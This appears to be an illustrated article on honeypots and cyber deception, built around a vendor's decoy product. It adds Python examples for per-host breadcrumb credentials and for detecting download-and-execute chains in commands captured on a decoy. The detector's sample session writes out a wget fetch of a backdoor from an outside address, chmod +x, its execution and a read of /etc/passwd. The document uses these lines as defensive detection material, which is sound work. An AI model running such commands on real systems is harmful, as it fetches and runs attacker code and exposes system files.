The story of the honeypot: A tale of deception

What is a decoy and how do you build a story of deception?

1. Looking at the attacker instead of the attack
Credit: Pixabay

Honeypots have been around for decades, and defenders have used deception elements in their networks for almost as long. What has matured is the technology built around one fact: attackers are human, and humans make mistakes. Cyber deception takes advantage of those mistakes, leading the attacker along a pre-planned path to where the defender wants them to be. Gadi Evron, former vice president at Kaspersky and PricewaterhouseCoopers and now founder and CEO of Cymmetria, walked me through a decoy server and showed me how controlling the information an attacker finds diverts them to where you want them to go.

2. A trail of crumbs
Credit: Cymmetria

Essentially, the decoy works the way a trail of breadcrumbs would: you want the bad actor to follow it to the destination you chose. The benefit of this technique is that you control the information the attacker finds, and a legitimate user has no reason to touch it, so whoever picks it up is worth watching. This image shows the defender's perspective: the creation of a breadcrumb (here, a credential) that will be placed on an endpoint to be found by an attacker doing reconnaissance.

3. The attacker perspective
Credit: Cymmetria

Understanding how attackers behave helps you lay down breadcrumbs they will actually want to follow. Here is how the decoy looks to an attacker running a credential-gathering tool on a compromised machine; at the bottom of the screen you can see the tool pulling out the credentials Cymmetria planted.

4. Deception dashboard
Credit: Cymmetria

From the point of entry, the deception tool lets you monitor the intruder's actions and pathways as they traverse the network. Where did the attacker gain access? How? Which credentials are being used? Because the planted credentials lead only to decoys, every use of one draws the attacker toward the decoy service you are running and tells you which breadcrumb was picked up. This image shows an attacker who started from the executive team's workstations, moved through human resources services, and then headed for a file server.
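As an added example (not Cymmetria's code, and not a description of how their product does it) of how planted credentials answer the "where did they get in" question: each breadcrumb password is derived per endpoint, so when the decoy service sees it used, it can map the login back to the host the credential was read from. The host names, IP addresses, seed and captured login attempts below are all constructed.

```python
"""Per-endpoint breadcrumb credentials and attribution of decoy logins.

Added example, not Cymmetria's code. Assumes a decoy service that
records each authentication attempt as (source_ip, username, password);
all host and IP names below are constructed.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Breadcrumb:
    endpoint: str   # host the credential is planted on
    username: str
    password: str
    target: str     # decoy service the credential appears to belong to


def new_seed() -> bytes:
    """Secret shared by the planting job and the decoy (assumed kept in a vault)."""
    return secrets.token_bytes(32)


def make_breadcrumb(endpoint: str, target: str, seed: bytes,
                    username: str = "svc_backup") -> Breadcrumb:
    """Derive a password unique to (endpoint, target, username).

    Deterministic from `seed`, so the decoy can rebuild the table without
    a database, and unique per endpoint, so any use of it tells you which
    host the attacker harvested it from.
    """
    msg = f"{endpoint}|{target}|{username}".encode()
    tag = hmac.new(seed, msg, hashlib.sha256).hexdigest()[:16]
    return Breadcrumb(endpoint, username, f"Bk-{tag}", target)


class DecoyAuthMonitor:
    """Match captured credentials against the planted set and raise alerts."""

    def __init__(self, crumbs):
        self._by_cred = {(c.username, c.password): c for c in crumbs}
        self.alerts = []

    def observe(self, source_ip: str, username: str, password: str):
        """Return an alert dict if the credential is a planted one, else None.

        A planted credential has no legitimate user, so a single use is a
        high-fidelity signal: source_ip is the attacker's current foothold
        and harvested_from is the endpoint where the breadcrumb was read.
        """
        crumb = self._by_cred.get((username, password))
        if crumb is None:
            return None
        alert = {
            "source_ip": source_ip,
            "harvested_from": crumb.endpoint,
            "decoy": crumb.target,
            "username": username,
        }
        self.alerts.append(alert)
        return alert


def demo():
    """Constructed scenario: crumbs on two workstations, one of them gets used."""
    seed = b"constructed-seed-do-not-reuse"
    crumbs = [
        make_breadcrumb("exec-ws-07", "fileserver-decoy", seed),
        make_breadcrumb("hr-ws-12", "fileserver-decoy", seed),
    ]
    monitor = DecoyAuthMonitor(crumbs)
    # Constructed capture from the decoy file server: one ordinary guess,
    # then the credential that was planted on hr-ws-12.
    monitor.observe("10.0.5.23", "administrator", "Summer2016!")
    monitor.observe("10.0.5.23", crumbs[1].username, crumbs[1].password)
    return monitor.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The same username is planted everywhere; only the password differs per host, which keeps the breadcrumb looking like one service account while still attributing each use. The decoy never needs to verify the password against anything real, it only looks it up in the planted table.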

5. Building a deception campaign
Credit: Cymmetria

In addition to showing the point of entry, the deception dashboard also reveals the technology and tools the attacker uses once inside the network. All of this information feeds the deception campaign, which is a story crafted for advanced attackers. In this dashboard you see management workstations, development servers, and HR workstations; on each of these the attacker will harvest credentials and other planted information that leads to the decoys.

6. Code execution
Credit: Cymmetria

After the attacker has nibbled on the breadcrumbs and followed the trail of deception, they get to work executing code. On the decoy (or honeypot) server you can watch every command the intruder runs and every piece of information they gather.

What you see here, from the bottom of the screen (earliest) to the top (latest):

The lowest one - the attacker runs wget, which downloads a file from an external server onto the compromised (decoy) host.
The middle one - marks the downloaded file as executable (on a Unix-like host, chmod +x).
The top one - runs the downloaded backdoor.
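As an added example, not Cymmetria's code: a small parser over the commands captured on a decoy that flags the three-step chain above (download, make executable, run), and also catches the variant where the downloaded file is handed to an interpreter and no chmod is needed. It assumes the decoy logs one shell command per line, oldest first; the session lines and the 203.0.113.10 address are constructed.

```python
"""Flag a download-and-execute chain in commands captured on a decoy.

Added example, not Cymmetria's code. Assumes the decoy logs each shell
command as one line, oldest first; the sessions below are constructed.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}

# Constructed capture from the decoy, oldest command first (the dashboard
# in the article shows the same sequence newest-on-top).
SAMPLE_SESSION = [
    "cat /etc/passwd",
    "wget http://203.0.113.10/u/bd -O /tmp/.x",
    "chmod +x /tmp/.x",
    "/tmp/.x -d",
]


@dataclass
class Finding:
    path: str
    download_line: int
    chmod_line: Optional[int]   # None when an interpreter ran the file directly
    exec_line: int


def _norm(path: str) -> str:
    """Treat './bd' and 'bd' as the same file."""
    return path[2:] if path.startswith("./") else path


def _download_target(argv):
    """Local path a wget/curl invocation writes to, or None."""
    if argv[0] not in DOWNLOADERS:
        return None
    for i, tok in enumerate(argv):
        if tok in ("-O", "-o", "--output-document", "--output") and i + 1 < len(argv):
            return _norm(argv[i + 1])
    if argv[0] == "wget":
        # wget without -O saves under the URL's last path component.
        for tok in argv[1:]:
            if tok.startswith(("http://", "https://", "ftp://")):
                name = tok.rstrip("/").rsplit("/", 1)[-1]
                return _norm(name) if name else None
    return None  # curl without -o writes to stdout, nothing lands on disk


def _chmod_exec_targets(argv):
    """Files a chmod makes executable, or None if this is not such a chmod."""
    if argv[0] != "chmod" or len(argv) < 3:
        return None
    mode = argv[1]
    symbolic = "x" in mode and "-" not in mode            # +x, a+x, u+rwx
    octal = (re.fullmatch(r"[0-7]{3,4}", mode) is not None
             and any(int(d) & 1 for d in mode[-3:]))      # 755, 0711, ...
    if symbolic or octal:
        return [_norm(t) for t in argv[2:]]
    return None


def find_download_exec_chains(commands):
    """Return a Finding for each file that is downloaded, made executable, then run."""
    downloaded, made_exec, findings = {}, {}, []
    for idx, line in enumerate(commands):
        try:
            argv = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: skip rather than crash on attacker input
        if not argv:
            continue
        path = _download_target(argv)
        if path:
            downloaded[path] = idx
            continue
        targets = _chmod_exec_targets(argv)
        if targets is not None:
            for t in targets:
                if t in downloaded:
                    made_exec[t] = idx
            continue
        # Execution: either the downloaded file itself is the program, or it
        # is passed as the first argument to a shell/interpreter.
        prog = _norm(argv[0])
        if prog in made_exec:
            findings.append(Finding(prog, downloaded[prog], made_exec[prog], idx))
        elif prog.rsplit("/", 1)[-1] in INTERPRETERS and len(argv) > 1:
            script = _norm(argv[1])
            if script in downloaded:
                findings.append(Finding(script, downloaded[script],
                                        made_exec.get(script), idx))
    return findings


if __name__ == "__main__":
    for f in find_download_exec_chains(SAMPLE_SESSION):
        print(f)
```

On a decoy this chain is a near-certain sign of tooling being staged, since nobody has a legitimate reason to fetch and run binaries there; on a production host the same logic would need allow-listing for package managers and deployment scripts.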
7. Building the right narrative
Credit: Cymmetria

As with any story, to captivate your audience and persuade them to accept your fictional world as real, you have to lure them in with language. I loved this image of Cymmetria's Deception (story) Wizard because it presents all the elements of good storytelling: setting, character, conflict, and suspense are what any author works with. The challenge for a decoy system is no different from the one facing a writer of fiction: if your audience doesn't buy into your world, they will not come along on the journey with you.